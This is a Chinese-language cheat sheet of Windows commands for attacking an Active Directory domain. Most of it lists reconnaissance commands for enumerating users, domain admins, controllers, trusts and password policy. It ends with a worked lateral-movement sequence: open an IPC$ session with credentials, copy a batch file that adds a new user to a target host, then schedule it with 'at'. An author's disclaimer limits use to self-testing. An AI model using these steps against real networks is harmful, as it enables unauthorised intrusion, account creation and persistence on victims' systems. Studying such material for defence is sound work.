[内网渗透]域渗透的基本命令
ipconfig /all #查询本机 IP 段,所在域等
net user //本机用户列表
net localgroup administrators //本机管理员[通常含有域用户]
net session // 查看当前会话
net use \\ip\ipc$ password /user:username // 建立域内 IPC 会话[空连接]
net share //查看 SMB 指向的路径[即共享]
net view //查询同一域内机器列表
net view /domain //查询域列表
net start // 查看当前运行的服务
whoami //查询账号所属权限
whoami/all //查看 sid 值
net accounts // 查看本地密码策略
net accounts /domain // 查看域密码策略
netstat –an //网络连接查询
route print //路由打印
nltest /dsgetdc:域名 //查询域控主机名。 如 nltest /dclist:bk
nltest /domain_trusts //可以列出域之间的信任关系
net view /domain:Secwing
查看 Secwing 域中计算机列表
net time /domain //判断主域,主域服务器都做时间服务器
net config workstation // 当前登录域
net group "enterprise admins" /domain 企业管理组
net user /domain wen@126.com test //修改域用户密码,需要域管理员权限,或者 Ctrl+Alt+Del 点击修改则不需要域管理员权限
net user /domain // 查询域用户
net group /domain // 查询域里面的工作组
net group "domain admins" /domain // 查询域管理员用户组
net localgroup administrators /domain //登录本机的域管理员
net group "domain controllers" /domain // 查看域控制器(如果有多台)
mstsc /admin //远程桌面登录到 console 会话解决 hash 无法抓出问题
dsquery computer domainroot -limit 65535 && net group “domain computers” /domain //列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain //列出该域内所有用户名
dsquery subnet //列出该域内网段划分
dsquery group && net group /domain //列出该域内分组
dsquery ou //列出该域内组织单位
dsquery server && net time /domain //列出该域内域控制器
net use \\192.168.1.5 Passw0rd! /user:admin //建立 ipc 连接
copy add.bat \\192.168.1.5\c$\wmpub //复制 add.bat 到目标 C 盘 wmpub 目录
add.bat 里面的内容是 net userTwi1ight Passw0rd! /add //添加 Twi1ight 用户
net time \\192.168.1.5 //查看目标当前时间,得到当前时间是 21:50:52
at \\192.168.1.5 21:52 c:\wmpub\add.bat //告诉目标在21:52的时候运行c:\wmpub\add.bat
at \\192.168.1.5 //查看目标的计划任务列表
----------------------------------------------------------------------------
作者:肖洋肖恩、
----------------------------------------------------------------------------
文中可能会存在纰漏,若发现请联系与我。
本文所有代码仅可用于站长自我检测与学习,如用于非法攻击一切后果自负。